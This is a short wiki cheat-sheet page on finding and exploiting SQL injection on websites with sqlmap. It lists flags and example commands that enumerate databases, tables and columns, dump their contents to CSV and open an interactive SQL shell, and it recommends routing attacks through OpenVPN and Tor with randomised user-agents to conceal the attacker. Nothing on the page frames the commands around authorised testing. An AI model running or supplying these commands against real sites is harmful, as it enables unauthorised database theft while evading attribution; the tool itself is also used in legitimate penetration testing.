User Tools
docu:csheet:ofsec:hack:sql:testing
SQL Injection testing and exploiting with sqlmap
Get, test, and exploit SQL injection vulnerabilities on a website.
Using a OpenVPN tunnel and then tor is pretty recommended,
although the timing-based attacks will mostly fail.
# -u URL | the base url to use (with the http GET payload) # --dbs | fetch all databases once a viable technique found. # --tables | combined with -D DATABASE, fetch all tables from that database # --dump | dump the selected data (into a csv) # -r reqfile | use an http base template for the attack (used in POST requests) # --tor | use the tor socks5 proxy at 127.0.0.1:9050 on attacks # --check-tor | query check.torproject.org to check tor is correctly used # --random-agent | use a random user-agent when attacking the target # -v# | verbosity level, recommended: 4, need more? 5, 6 is too crazy # examples sqlmap -u URL --dbs --random-agent --tor --check-tor -v5 sqlmap -u URL -D [DATABASE] --tables --random-agent --tor --check-tor -v5 sqlmap -u URL -D [DATABASE] -T [TABLE] --columns --random-agent --tor --check-tor -v5 sqlmap -u URL -D [DATABASE] -T [TABLE] --dump --random-agent --tor --check-tor -v5 sqlmap -r request_headers.txt -D DATABASE --tables
Once there is an attack vector, re-run the command using `–sql-shell` to run an interactive attack shell.
docu/csheet/ofsec/hack/sql/testing.txt · Last modified: 2020/02/08 21:05 by admin
Except where otherwise noted, content on this wiki is licensed under the following license: GNU Free Documentation License 1.3
